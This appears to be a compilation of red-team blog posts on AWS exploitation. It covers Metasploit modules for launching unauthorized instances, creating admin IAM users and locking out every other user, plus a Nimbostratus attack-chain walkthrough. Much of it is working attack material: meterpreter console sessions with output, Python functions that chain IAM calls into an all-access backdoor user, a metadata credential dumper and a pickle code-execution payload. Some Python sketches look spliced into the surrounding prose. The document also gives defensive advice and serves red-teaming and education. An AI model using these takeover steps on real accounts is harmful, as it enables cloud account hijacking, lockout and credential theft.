The Cumulus Toolkit – Launch Instances Module

There are times when having owned a Cloud account (complete account takeover, see this post) is not enough. In some cases there may not be many resources in the account, or the data in the account is, from a security standpoint, simply uninteresting. However, the blast radius of a compromised account may extend to other accounts, datacenters, and/or other hosts if the compromised account has VPC peers, a persistent VPN connection, and/or other network tunnels. Here we present the Launch Instances module, a module for running unauthorized workloads, which can be used to traverse into a VPC peer, escalate privileges, and/or launch other unauthorized workloads.

Code here:


Shell #1:

 > use auxiliary/admin/aws/aws_launch_instances
 > set AccessKeyId ...
 > set SecretAccessKey ...
 > set SSH_PUB_KEY ssh-rsa ABCDEDG123...
 > run
 [*] Created security group: sg-abcdefg
 [*] Launching instance(s) in us-west-2, AMI: ami-1e299d7e, key pair name: admin, security group: sg-abcdefg, subnet ID: subnet-hijklmn
 [*] Launched instance i-12345678 in us-west-2 account 012345678900
 [*] instance i-12345678 status: initializing
 [*] instance i-12345678 status: ok
 [*] Instance i-12345678 has IP address
 [*] Auxiliary module execution completed

Shell #2:

 ssh ec2-user@ -L 2447:

Shell #1 again:

 > load aggregator
 > aggregator_connect

For more information on metasploit-aggregator, see


AWS API Access Keys

API access keys can be used to make calls against the AWS API, for example to
retrieve deployment packages from S3.
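For instance, with stolen keys an attacker can pull artifacts straight out of S3. A minimal sketch of the idea; the bucket/key names are purely illustrative, and the boto3-style client is injected by the caller rather than constructed here:

```python
def fetch_deployment_package(s3, bucket, key):
    """Download an object via a boto3-style client handed in by the caller.

    get_object returns a dict whose "Body" is a stream-like object.
    """
    return s3.get_object(Bucket=bucket, Key=key)["Body"].read()
```

Handing the client in keeps the sketch testable and makes clear that the keys themselves are the only thing the attacker needs.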


A VPC, or Virtual Private Cloud, is an isolated local area network. Network access
can be made available by assigning an Internet-routable IP address to a host or by
routing traffic to it through an ELB (Elastic Load Balancer). In either case,
security groups are used to open access to network ranges and specific TCP/UDP
ports. Security groups provide much of the functionality of traditional firewalls
and can be configured by specifying a protocol, a CIDR, and a port.
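That (protocol, CIDR, port) triple can be sanity-checked with nothing more than the standard library. A hedged sketch of the concept (this is not AWS API code, just a validator for the rule shape described above):

```python
import ipaddress

def validate_sg_rule(protocol, cidr, port):
    """Validate a security-group style rule: protocol, CIDR, and port."""
    if protocol not in ("tcp", "udp"):
        raise ValueError("unsupported protocol: %s" % protocol)
    ipaddress.ip_network(cidr)  # raises ValueError on a malformed CIDR
    if not 0 < port <= 65535:
        raise ValueError("port out of range: %d" % port)
    return (protocol, cidr, port)
```

E.g., `validate_sg_rule("tcp", "0.0.0.0/0", 22)` accepts the wide-open SSH rule this module creates by default.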

How it Works

Although hosts can be launched using the
Web console or the CLI, launching a host in the Cloud requires a fair
amount of configuration; this module does its best to abstract configuration
requirements away from the user by auto-detecting the VPC and subnets, creating
security groups, etc. It performs several tasks to launch a host with
a public IP address, which are as follows: 1) select a VPC, 2) select a subnet, 3)
create/select a security group, 4) create/select a key-pair, and 5) launch
a host.

The module will attempt to launch the host in the first VPC it finds in the
given region (`Region` option). Most of the time there is only one VPC per
account per region; however, one may find multiple VPCs within the same region.
In that case, the `VPC_ID` advanced option can be used to specify the VPC to
use. Selecting a subnet is a bit more complicated. To have traffic routed
between us and the Cloud host, a public subnet (a subnet that is routable to an
Internet gateway) must be selected, and the Cloud host must be associated with
an Internet-routable IP address. The module dynamically finds which subnet to
launch the host in: it will use the first subnet it finds having the
`Auto-assign Public IP` option set; if no such subnet exists, it will
select the first subnet having an Internet gateway. To circumvent this process,
the `SUBNET_ID` advanced option can be set.
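The subnet-selection order described above boils down to a two-pass scan. A sketch over illustrative subnet records (the field names are ours, not the module's actual attribute names):

```python
def pick_subnet(subnets):
    """First pass: a subnet that auto-assigns public IPs.
    Second pass: any subnet routable to an Internet gateway."""
    for s in subnets:
        if s.get("auto_assign_public_ip"):
            return s
    for s in subnets:
        if s.get("has_internet_gateway"):
            return s
    return None  # no public subnet; the launch cannot be reached
```

The two passes matter: an auto-assign subnet wins even if it appears after a plain Internet-gateway subnet in the listing.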

When launching a Cloud host, at least one security group is required. There are
several advanced options for creating/selecting a security group. The
`SEC_GROUP_ID` option works much the same way the `VPC_ID` option does:
if it is set, the module uses the given group. If the `SEC_GROUP_ID` option is
not set, the module will attempt to create a security group using the values
specified in the `SEC_GROUP_CIDR`, `SEC_GROUP_NAME`, and `SEC_GROUP_PORT`
options as configuration.
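The create-or-select decision reduces to a simple guard. A hedged sketch, with the actual AWS call replaced by an injected callback and the `tcp:22` default taken from the option descriptions later in this post:

```python
def resolve_security_group(opts, create_group):
    """Use SEC_GROUP_ID when given; otherwise create a group from the
    name/CIDR/port options. create_group stands in for the AWS call."""
    if opts.get("SEC_GROUP_ID"):
        return opts["SEC_GROUP_ID"]
    return create_group(opts.get("SEC_GROUP_NAME"),
                        opts.get("SEC_GROUP_CIDR"),
                        opts.get("SEC_GROUP_PORT", "tcp:22"))
```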

The `KEY_NAME` and `SSH_PUB_KEY` options are used in conjunction to select or
create a key-pair (a named SSH public key). Key-pairs are used to authenticate
to the host once it is running. `KEY_NAME` defaults to `admin`, while
`SSH_PUB_KEY` is optional. If `SSH_PUB_KEY` is left unset, the module
will not attempt to create a key-pair and will simply attempt to launch the
instance using the existing key-pair denoted by `KEY_NAME`. To set the
`SSH_PUB_KEY` option, a public SSH key must be provided, such as one generated
with `ssh-keygen -y -f <private key filename>`. Once a key-pair is
created/selected, the module launches the host via the AWS API, specifying that
it should associate a public IP address.

As part of launching the host, it passes user-data (a shell script) that
installs metasploit-aggregator and runs it in a screen session.
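User-data is just a script that EC2 hands to the instance at first boot. A hypothetical builder sketch; the actual script the module ships differs, and the gem name and screen invocation here are assumptions for illustration:

```python
def build_user_data():
    """Assemble a first-boot shell script that installs
    metasploit-aggregator and leaves it running in a detached
    screen session (illustrative commands, not the module's script)."""
    return "\n".join([
        "#!/bin/sh",
        "gem install metasploit-aggregator",
        "screen -dmS aggregator metasploit-aggregator",
    ])
```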


The Launch Instances module is an auxiliary module that can be loaded using the
use command. To run the module, only the `AccessKeyId`, `SecretAccessKey`, and
`KEY_NAME` options are required.

Basic Options:

* `AMI_ID`: The Amazon Machine Image (AMI) ID (region dependent)
* `RHOST`: the AWS EC2 Endpoint (; you may change this to an endpoint closer to you)
* `Region`: The default region (us-west-2), must match endpoint
* `AccessKeyId`: AWS API access key
* `SecretAccessKey`: AWS API secret access key
* `Token`: AWS API session token, optional
* `KEY_NAME`: The SSH key to be used for ec2-user
* `SSH_PUB_KEY`: The public SSH key to be used for ec2-user, e.g., “ssh-rsa ABCDE…”
* `USERDATA_FILE`: The script that will be executed on start

Advanced Options:

* `INSTANCE_TYPE`: The instance type
* `MaxCount`: Maximum number of instances to launch
* `MinCount`: Minimum number of instances to launch
* `ROLE_NAME`: The instance profile/role name
* `RPORT`: AWS EC2 Endpoint TCP Port
* `SEC_GROUP_ID`: the EC2 security group to use
* `SEC_GROUP_CIDR`: the EC2 security group network access CIDR, defaults to
* `SEC_GROUP_NAME`: the EC2 security group name
* `SEC_GROUP_PORT`: the EC2 security group network access port, defaults to tcp:22
* `SUBNET_ID`: The public subnet to use
* `UserAgent`: The User-Agent header to use for all requests
* `VPC_ID`: The EC2 VPC ID



 msf > use auxiliary/admin/aws/aws_launch_instances
 msf auxiliary(aws_launch_instances) > show options

Module options (auxiliary/admin/aws/aws_launch_instances):

Name             Current Setting              Required  Description
 ----             ---------------              --------  -----------
 AMI_ID           ami-1e299d7e                 yes       The Amazon Machine Image (AMI) ID
 AccessKeyId                                   yes       AWS access key
 KEY_NAME         admin                        yes       The SSH key to be used for ec2-user
 Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
 RHOST    yes       AWS region specific EC2 endpoint
 Region           us-west-2                    yes       The default region
 SSH_PUB_KEY                                   no        The public SSH key to be used for ec2-user, e.g., "ssh-rsa ABCDE..."
 SecretAccessKey                               yes       AWS secret key
 Token                                         no        AWS session token
 USERDATA_FILE                                 no        The script that will be executed on start

msf auxiliary(aws_launch_instances) > set SecretAccessKey asdfasd+asdfasdfasd...
 SecretAccessKey => asdfasd+asdfasdfasd...
 msf auxiliary(aws_launch_instances) > set AccessKeyId AKIAAKIAAKIAAKIAAKIAA
 msf auxiliary(aws_launch_instances) > set KEY_NAME ec2-user-key
 KEY_NAME => ec2-user-key
 msf auxiliary(aws_launch_instances) > set SSH_PUB_KEY ssh-rsa ABCDEDG123...
 SSH_PUB_KEY => ssh-rsa ABCDEDG123...
 msf auxiliary(aws_launch_instances) > run

[*] Created ec2-user-key (ab:cd:ef:12:34:56:78:90:ab:ac:ad:ab:a1:23:45:67)
 [*] Created security group: sg-12345678
 [*] Launching instance(s) in us-west-2, AMI: ami-1e299d7e, key pair name: ec2-user, security group: sg-12345678, subnet ID: subnet-abcdefgh
 [*] Launched instance i-12345678 in us-west-2 account 123456789012
 [*] instance i-12345678 status: initializing
 [*] instance i-12345678 status: initializing
 [*] instance i-12345678 status: ok
 [*] Instance i-12345678 has IP address
 [*] Auxiliary module execution completed

When the host has passed its primary system checks, its IP address will be
displayed. We can use this IP address to SSH to the host. Note that
most users will want to set the `SEC_GROUP_CIDR` option to restrict access to
the new Cloud host.

To SSH into the host, specify the SSH key and the ec2-user username, e.g.,

 $ ssh -i ec2-user-key ec2-user@ -L 2447:
 The authenticity of host ' (' can't be established.
 ECDSA key fingerprint is SHA256:ePj6WtCeK...
 Are you sure you want to continue connecting (yes/no)? yes
 Warning: Permanently added '' (ECDSA) to the list of known hosts.
 __|  __|_  )
 _|  (     /   Amazon Linux AMI
 5 package(s) needed for security, out of 9 available
 Run "sudo yum update" to apply all updates.
 [ec2-user@ip-172-31-8-176 ~]$

Back in the Metasploit console you can now connect via aggregator:

 msf auxiliary(aws_launch_instances) > load aggregator
 msf auxiliary(aws_launch_instances) > aggregator_connect
 [*] Connecting to Aggregator instance at
 msf auxiliary(aws_launch_instances) >

Formation of the Cumulus Toolkit

I just got home after a busy week at RSA 2017 and wanted to recap our presentation and expand on some issues. If you’d like to check out the video, here it is.

The Cloud gives us the power we need to crush those who oppose us… well, not really, but I do love how easy it is to spin up resources on demand and how easy it is to deploy my application. I can literally go from zero infrastructure to a highly available application within minutes. This power and ease, however, comes at a price, as it is very easy to be insecure in the Cloud. Anyone who has ever uploaded their API access keys to GitHub knows what a nightmare this can be [1], [2], [3].

There are many players in the Cloud Services Provider space, but one stands alone. Amazon Web Services (AWS) has many times more computing capacity than its fourteen largest competitors combined [4]. It is for this reason that we concentrate on AWS and will use AWS and the Cloud interchangeably from here on.

Many of us have been living in the safe confines of our datacenters for far too long. Datacenters usually have strict configuration management, intrusion detection systems, and processes for making changes that impact network security, such as opening access through the firewall. As DevOps engineers, this crunchy outer shell tends to make us feel safe and can detach us from owning our own security. Guess what: in the Cloud there is no such crunchy shell, and there is little configuration management when it comes to restricting or managing who makes changes, as separation of duties has certain challenges in the Cloud.

The Cloud is growing rapidly, and a lot of the folks jumping on the bandwagon may not have a good grasp of the attack surface. The combination of this new attack surface and that lack of understanding results in insecure apps making it to production, which is low-hanging fruit for attackers.

Identity and Access Management

Identity and Access Management (IAM) in the Cloud is part of the new attack surface and is easy to get wrong. IAM is used to control who has access to what, and policies codify this access. Access policies can be applied to users, groups, and roles, and have an Effect (allow or deny), an Action (specific API actions), Resources (the things we are controlling access to), and Conditions (additional controls for restricting access).

The way we see it, there are three types of policies. The Good: a minimum-privileges policy that specifies resources and makes use of conditions. The Bad: wildcards are used to give wide access to every action available on a service, and we begin to commingle IAM access with DevOps access. And finally, The Ugly: the infamous star-dot-star (*.*) policy, which allows any action on any resource without making use of conditions. So, how do you determine if your policies implement minimum privileges or are otherwise not bad or ugly? The approach we have taken to determine whether we have a bad or ugly policy is red teaming, i.e., we actively attempt to take over accounts where we see weaknesses. This allows us to concentrate on the most atrocious misuses of IAM so that DevOps engineers can concentrate on fixing the most dangerous configurations.
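This triage can even be mechanized. A rough sketch that scores a single parsed policy statement against the taxonomy above; the labels and the wildcard heuristics are ours, not anything AWS provides:

```python
def classify_statement(stmt):
    """Return 'ugly' for *.* statements, 'bad' for wildcard actions,
    and 'good' otherwise. stmt is a parsed IAM statement dict."""
    actions = stmt.get("Action", [])
    if isinstance(actions, str):
        actions = [actions]
    resources = stmt.get("Resource", [])
    if isinstance(resources, str):
        resources = [resources]
    if "*" in actions and "*" in resources:
        return "ugly"   # star-dot-star: anything on anything
    if any(a == "*" or a.endswith(":*") for a in actions):
        return "bad"    # service-wide wildcard access
    return "good"       # scoped actions; check conditions by hand
```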

The Cumulus Toolkit

We used to do much of our red-teaming work by hand and have noticed that there is a lack of tools for testing the security of Cloud deployments, so we have taken the time to automate our attacks. We are in the process of developing the Cumulus Toolkit, a cloud exploitation toolkit based on Metasploit, an open source exploitation framework.

At RSA we showcased and demonstrated a few Cumulus modules. The first is the CIAMU (Create IAM User) module, a post-exploitation module used to create an IAM user with admin privileges. The second is the Launch Instances module. Often we compromise a host or access keys that have EC2 privileges, which may allow us to launch an instance with elevated privileges; we can then use this new access to escalate privileges further. Lastly, we have the IAM account lockout module. This is the most evil module of them all: it can be used to lock all other users out of an account. A word of caution: never use this module in a production environment, as it will remove all users’ passwords and disable their access keys.

For more information about Cumulus please follow development here:


AWS does give us everything we need to secure our environments. IAM is very granular and has controls to restrict where API access keys can be used from. The issues raised here and in our presentation are really education and awareness issues that can be addressed with proper training. A useful strategy for developing IAM policy, and potentially staying safe from these attacks, is to put the attacker hat on and try to think of ways the bad guys can take advantage of your controls. Think about blast radius containment, read the docs (especially for IAM), and lastly, try not to be the guinea pig; just because there is a sexy new service that everybody is talking about doesn’t mean you should use it in your critical applications.

* Presentation:
* Slides:

Works Cited

[1] D. Pauli, “Dev put AWS keys on Github. Then BAD THINGS happened,” The Register, 6 January 2015. [Online]. Available: dev_blunder_shows_github_crawling_with_keyslurping_bots/. [Accessed 5 January 2017].
[2] S. Gooding, “Ryan Hellyer’s AWS Nightmare: Leaked Access Keys Result in a $6,000 Bill Overnight,” WP Tavern, 26 September 2014. [Online]. Available: . [Accessed 5 January 2017].
[3]  M. Kotadia, “AWS urges developers to scrub GitHub of secret keys,” iTnews, 24 March 2014. [Online]. Available: . [Accessed 5 January 2017].
[4]  L. Leong, G. Petri, B. Gill and M. Dorosh, “Magic Quadrant for Cloud Infrastructure as a Service, Worldwide,” Gartner, Stamford, 2016.

AWS Account Takeover – The Metasploit Way

I’ve been taking over AWS accounts the manual way for way too long. This module has been in the works for about a year and it wasn’t until our presentation was accepted to RSA 2017 that I finally committed the time to getting the Pull Request into Metasploit.

The Metasploit Module: aws_create_iam_user

aws_create_iam_user is a simple post module that can be used to take over AWS accounts. Sure, it is fun enough to take over a single host, but you can own all hosts in the account if you simply create an admin user.


This module depends on administrators being lazy and not using least privilege. Only in rare cases, probably close to none, should instances have the following privileges:

  • iam:CreateUser
  • iam:CreateGroup
  • iam:PutGroupPolicy
  • iam:AddUserToGroup
  • iam:CreateAccessKey
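Chained together, those five privileges are all it takes to mint an admin. A sketch of the sequence against any boto3-style IAM client; the user/group names and the policy document are placeholders, and this shows the flow rather than the module's actual code:

```python
# Hypothetical all-access policy document (the classic star-dot-star).
ADMIN_POLICY = ('{"Version":"2012-10-17","Statement":'
                '[{"Effect":"Allow","Action":"*","Resource":"*"}]}')

def take_over(iam, user="metasploit", group="metasploit"):
    """Run the five privileged IAM calls in order; returns the new key."""
    iam.create_user(UserName=user)
    iam.create_group(GroupName=group)
    iam.put_group_policy(GroupName=group, PolicyName=group,
                         PolicyDocument=ADMIN_POLICY)
    iam.add_user_to_group(GroupName=group, UserName=user)
    return iam.create_access_key(UserName=user)
```

With a real `boto3.client("iam")` in place of `iam`, the return value would carry the fresh `AccessKeyId`/`SecretAccessKey` pair.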

Establish a foothold

You first need a foothold in AWS; e.g., here we use sshexec to get the foothold and launch a Meterpreter session.

$ ./msfconsole
msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set password some_user
password => some_user
msf exploit(sshexec) > set username some_user
username => some_user
msf exploit(sshexec) > set RHOST
msf exploit(sshexec) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf exploit(sshexec) > exploit -j
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(sshexec) > [*] - Sending stager...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Command Stager progress -  42.09% done (306/727 bytes)
[*] Command Stager progress - 100.00% done (727/727 bytes)
[*] Sending stage (1495599 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-11-21 17:58:42 +0000

We will be using session 1.

msf exploit(sshexec) > sessions

Active sessions

  Id  Type                   Information                                                                       Connection
  --  ----                   -----------                                                                       ----------
  1   meterpreter x86/linux  uid=50011, gid=50011, euid=50011, egid=50011, suid=50011, sgid=50011 @ ip-19-... -> (

Create IAM User

Now you can load aws_create_iam_user and specify a Meterpreter session, e.g., SESSION 1.

msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
msf post(aws_create_iam_user) > set IAM_USERNAME metasploit
IAM_USERNAME => metasploit
msf post(aws_create_iam_user) > set SESSION 1
msf post(aws_create_iam_user) > exploit

[*] - looking for creds...
[*] Creating user: metasploit
[*] - Connecting (
[!] Path: /
[!] UserName: metasploit
[!] Arn: arn:aws:iam::097986286576:user/metasploit
[!] UserId: AIDA...
[!] CreateDate: 2016-11-21T17:59:50.010Z
[*] Creating group: metasploit
[*] - Connecting (
[!] Path: /
[!] GroupName: metasploit
[!] Arn: arn:aws:iam::097986286576:group/metasploit
[!] GroupId: AGPAIENI6YTM5JVRQ2452
[!] CreateDate: 2016-11-21T17:59:50.554Z
[*] Creating group policy: metasploit
[*] - Connecting (
[!] xmlns:
[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
[*] Adding user (metasploit) to group: metasploit
[*] - Connecting (
[!] xmlns:
[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
[*] Creating API Keys for metasploit
[*] - Connecting (
[!] AccessKeyId: AKIA...
[!] SecretAccessKey: THE SECRET ACCESS KEY...
[!] AccessKeySelector: HMAC
[!] UserName: metasploit
[!] Status: Active
[!] CreateDate: 2016-11-21T17:59:51.967Z
[+] API keys stored at: /home/pwner/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
[*] Post module execution completed
msf post(aws_create_iam_user) > exit -y

You can see the API keys stored in loot:

$ cat ~/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt

{"AccessKeyId":"AKIA...","SecretAccessKey":"THE SECRET ACCESS KEY...","AccessKeySelector":"HMAC","UserName":"metasploit","Status":"Active","CreateDate":"2016-11-21T17:59:51.967Z"}

The Dangers of All-You-Can-Eat Copy-Pasta

DevSecOps enables small projects to move fast, sometimes too fast. In the early stages of a DevSecOps project, engineers get used to moving fast and getting the job done. The truth is that DevSecOps is challenging because it requires an engineer to think at all levels of an application and often implement each layer; this is what we call a full-stack engineer. Engineers often borrow code from each other, modify it to fit their needs, and move on to the next problem. After all, why reinvent the wheel when someone else already has? The issue with this approach is that one may not take the time to fully understand what the code does.

Copied code often has unused or insecure functionality, because the new scope under which the code is being used differs from its original intent. In addition, any errors originally present in the code are carried over into the new task. This unused/insecure code can stick around from project to project like a vestigial tail. This pattern of duplicating code with the intent of moving fast and just getting the job done is the anti-pattern we call all-you-can-eat copy-pasta.

What do you do if your project has fallen victim to the dangers of all-you-can-eat copy-pasta? Well, admitting that you have a problem is the first step. The second step is to allow your project to slow down, not too much, just enough to do some long overdue cleanup. Start reviewing your code and remove any vestigial tails: unused code or code that will expose your software to security flaws or denial of service. Reviewing your code will allow you to identify where code has been duplicated. Implement libraries for tasks requiring common functionality where it makes sense. This way, common functionality becomes maintainable and localized, and implementing fixes only requires changes in one place instead of in every project that slightly modified the code. Lastly, instill in project engineers that copying code without understanding it has many pitfalls, and encourage them to be on the lookout for areas of your project that could benefit from a centralized library or code base.

Splunk App for AWS Proxy and Instance Profiles for CloudTrail

Proxying the Splunk App for AWS through boto.cfg. Because sometimes you want to deploy Splunk in a VPC and have it proxy out to the AWS API.

$ cat /etc/boto.cfg
proxy = IP_ADDRESS
proxy_port = PORT

Using instance profiles for the Splunk App for AWS. Because you don’t want to hard-code your IAM creds into Splunk or save them in clear text, and using instance profiles is way cooler.

$ cd $SPLUNK_HOME/etc/apps/SplunkAppforAWS/bin
# diff
< #sqs_queue_region,
< #aws_access_key_id=key_id,
< #aws_secret_access_key=secret_key
< sqs_queue_region
> sqs_queue_region,
> aws_access_key_id=key_id,
> aws_secret_access_key=secret_key
< #aws_access_key_id=key_id,
< #aws_secret_access_key=secret_key
> aws_access_key_id=key_id,
> aws_secret_access_key=secret_key

Now you can do this in the Splunk App for AWS:


Preventing Nimbostratus Attacks on AWS

A formless layer that is almost uniformly dark gray

Security researchers and bad guys alike are beginning to turn their sights onto AWS. Recent conferences have brought to light a number of AWS-specific vulnerabilities and new tools to exploit them. Nimbostratus is a proof-of-concept (PoC) fingerprinting and exploitation tool for AWS developed by Andres Riancho. It uses application vulnerabilities and insecure AWS settings to pivot and escalate Cloud access. The following is an exploratory investigation of the security issues raised by the Nimbostratus toolkit and paper.

The Chained Attack

The Nimbostratus toolkit exploits known application and infrastructure vulnerabilities and depends on a chain of vulnerabilities to gain system-level privileges on an AWS-hosted instance and Administrator-level access on the hosting AWS account. The following is an account of how these vulnerabilities can be linked together.

At a high level, the chain of vulnerabilities is as follows: 1) an application vulnerability is exploited to proxy the Metadata service; 2) the Metadata service is leveraged to retrieve IAM credentials; 3) credential permissions are enumerated; 4) the compromised IAM credentials are used to write an SQS message that will 5) execute code via a vulnerable SQS application on the target instance; 6) other IAM credentials are retrieved from the compromised instance to 7) create an Administrator IAM user.

HTTP Request Proxy Vulnerability

To get a foothold in AWS, Nimbostratus depends on an application-level vulnerability to proxy requests. Request proxying is common in web applications to reach backend resources (or other resources behind the DMZ); however, application proxying is rarely implemented with a whitelist of available resources. In the PoC, the Nimbostratus authors use such a vulnerability to retrieve the AMI ID and other confidential information from a vulnerable server.


In addition to the AMI ID, the Metadata service divulges other sensitive information:

  • AWS Region
  • IP Address
  • Instance Type
  • Instance Profile Credentials

Although gaining the initial foothold depends on a very specific vulnerability in the PoC, it is not inconceivable that other similar vulnerabilities, such as command injection, could be exploited for this very purpose.

Dumping Instance Profile Credentials

Instances often have profiles attached to them. From the AWS Identity and Access Management documentation: “An instance profile is a container for IAM roles. Instance profiles are used to pass role information to an Amazon EC2 instance when the instance starts. When you use the Amazon EC2 console to launch an instance with an IAM role, the console displays a list of roles, which is populated with instance profile names.”

This means that in order for the instance to make use of its IAM role, it must first retrieve its own credentials; this can easily be done by leveraging the Metadata service, e.g., curl<profile name>. An application vulnerability that proxies the Metadata service can be exploited to divulge instance profile credentials.
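The retrieval amounts to two unauthenticated GETs against the well-known metadata address: one to list the role names, one to fetch the chosen role's credentials. A sketch with the HTTP fetch injected so no real request is made (the path layout follows AWS's documented metadata tree):

```python
import json

CREDS_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def dump_profile_creds(fetch):
    """fetch(url) -> str. The bare path lists role names; appending a
    role name returns that role's temporary credentials as JSON."""
    role = fetch(CREDS_URL).splitlines()[0]
    return json.loads(fetch(CREDS_URL + role))
```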

// img here, it’s coming

Note that the Access Key ID, Secret Access Key, and Security Token are easily retrievable.

Enumerating IAM Permissions

Given the Access Key ID, Secret and Token, the Nimbostratus toolkit can be used to enumerate permissions available to the IAM user:

// img here, it’s coming

Although not entirely clear here, these credentials can be used to read & write to SQS.

Exploiting SQS for Arbitrary Code Execution

The next step in the chain of exploitation in the PoC is to exploit a vulnerable SQS client running on the target instance. A number of messaging applications exist that make working with Amazon SQS easier. One such application, which prides itself on its ease of use, is the Celery Project. From the Celery Project website: “Celery is a simple, flexible and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It’s a task queue with focus on real-time processing, while also supporting task scheduling…”

Although Celery may be easy to use, its authors admit that parts of it, e.g., the pickle serializer, are inherently insecure because of their lazy evaluation of data as code. Given compromised SQS credentials as described above, this makes it possible to gain system-level privileges on any host using Celery’s pickle serializer. All an attacker needs to do is inject a message formatted with Python commands that return a shell to a listening server.
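The pickle problem is easy to demonstrate without Celery at all: an object's `__reduce__` can name any callable to be invoked at load time, so unpickling attacker-controlled bytes is code execution. A benign stand-in, where a recorded list takes the place of `os.system` or a reverse shell:

```python
import pickle

hits = []

def attacker_callable(arg):
    # Benign stand-in for os.system("...") or spawning a shell.
    hits.append(arg)

class Payload(object):
    def __reduce__(self):
        # "To rebuild this object, call attacker_callable('pwned')."
        return (attacker_callable, ("pwned",))

blob = pickle.dumps(Payload())  # what the attacker puts on the queue
pickle.loads(blob)              # what the vulnerable consumer does
```

After `loads`, `hits` contains `"pwned"`: the consumer ran the attacker's callable simply by deserializing the message.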

IAM Privilege Escalation

Once there is a clear path to arbitrary code execution on a Cloud host, gaining system-level privileges is trivial. The Cloud instance in the PoC can now be searched for additional IAM credentials, and if there happen to be other IAM credentials with specific permissions that allow privilege escalation, an IAM Administrator account can be created. IAM privilege escalation is possible when a user has IAM capabilities that allow them to create other IAM users. More specifically, they need these IAM permissions:

  • CreateUser
  • CreateAccessKey
  • PutUserPolicy

The compromised credentials can be used to create a user that has all access to all services.
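With just those three permissions, the escalation is three calls against a boto3-style IAM client. A sketch; the user name and the all-access policy document below are illustrative, and the client is injected rather than constructed:

```python
import json

# The all-access policy document referred to above (illustrative).
ALL_ACCESS = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
})

def escalate(iam, user="backdoor"):
    """CreateUser + PutUserPolicy + CreateAccessKey, per the list above."""
    iam.create_user(UserName=user)
    iam.put_user_policy(UserName=user, PolicyName="all-access",
                        PolicyDocument=ALL_ACCESS)
    return iam.create_access_key(UserName=user)
```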


Although the vulnerabilities exploited in the Nimbostratus paper are set up by the authors, they do convey that seemingly low-risk vulnerabilities can be used to gain system-level access and take control of an AWS account. None of the vulnerabilities demonstrated here is overly complex, and they are often seen in industry applications.

Attack Prevention Strategies

Web Application Vulnerabilities

The key takeaway is that application security is the first line of defense; threat modeling, static and dynamic testing, and penetration testing, if performed during the development lifecycle, are proven to reduce the number of vulnerabilities that could expose infrastructure to attack.

Use an Alternative to the Metadata Service

Secrets are often passed to an instance through the instance profile or user-data via the Metadata service, and all instance profile and user-data content is available to any user or process running on the instance. There is no way to delete these secrets after instance startup, so anybody who has access to the instance can simply request them. Needless to say, this practice should be discouraged, and an alternative method for transferring credentials should be employed.

Disable the Metadata Service

A strategy that may help constrain the Metadata service is to make it inaccessible by null-routing it. The Metadata service can be disabled by adding a reject route at the end of the user-data; this effectively ensures that only root can re-enable the service. E.g.,

# route add -host reject

Non-root users would first need to obtain appropriate authorization before they could re-enable and read from the service.

Don’t Eat Celery

Beware of third-party messaging tools that consume data and treat it as code. Tools such as Celery that use eval-style methods for parsing data are unsafe, and their use is discouraged.

Other high level recommendations

  • Always make use of the Principle of Least Privilege
  • Always use IAM credentials instead of the root account
  • Use different users for different tasks
  • Audit users and groups


AWS A through Z… Boto Soup… Some clever title P1

I’ve been staying up a bit longer than I usually do and wanted to dedicate some time to Amazon Web Services (AWS), with emphasis on the S. I’ve been cooking up a bit of boto soup to check all the AWS managed services. These are simple checks (initially), just one or two per service to see if it is in use. The applications for doing this are many; I would just like to get a bit more familiar with the Boto API and the AWS services.

Let’s write a simple class that helps us manage the credentials:

import os

class AwsServiceScanner:
    def __init__(self, key, secret):
        self.key = key
        self.secret = secret

if __name__ == "__main__":
    key, secret = os.environ['AWS_ACCESS_KEY_ID'], os.environ['AWS_SECRET_ACCESS_KEY']
    scanner = AwsServiceScanner(key, secret)

Nothing fancy; just pull the environment variables and add them as instance variables of an otherwise empty class. What we want to do is go through EVERY service and determine if it is being used, the results of which will be saved to a dictionary. Every service in every region, that is.

    def is_ec2_in_use(self):
        for region in boto.ec2.regions():
            conn = boto.ec2.connect_to_region(region.name, aws_access_key_id=self.key, aws_secret_access_key=self.secret)
            print len(conn.get_all_instances()) != 0

It is easy enough to determine if EC2 is being used: we simply iterate through the regions, connect to each one, and pull the instances. If instances are returned, then we know the service is in use. We can do a bit better; let’s try to print the service (EC2) and the region.

    def is_ec2_in_use(self):
        name = "EC2 ({!s})\t\t"
        for region in boto.ec2.regions():
            conn = boto.ec2.connect_to_region(region.name, aws_access_key_id=self.key, aws_secret_access_key=self.secret)
            print name.format(region.name), len(conn.get_all_instances()) != 0

Now we can tell if a service in a region is being used, here is an attempt to generalize the pattern.

    def is_service_in_use(self, name, region_name, fn, params={}):
        try:
            service_region_name = name.format(region_name)
            if SERVICES.has_key(service_region_name):
                SERVICES[service_region_name] = SERVICES[service_region_name] or len(fn(**params)) != 0
            else:
                SERVICES[service_region_name] = len(fn(**params)) != 0
        except:
            print "Error calling '"+fn.__name__+"()' for "+name.format(region_name)

    def is_ec2_in_use(self):
        name = "EC2 ({!s})\t\t"
        for region in boto.ec2.regions():
            conn = boto.ec2.connect_to_region(region.name, aws_access_key_id=self.key, aws_secret_access_key=self.secret)
            self.is_service_in_use(name, region.name, conn.get_all_instances)
            self.is_service_in_use(name, region.name, conn.get_all_addresses)

To be continued…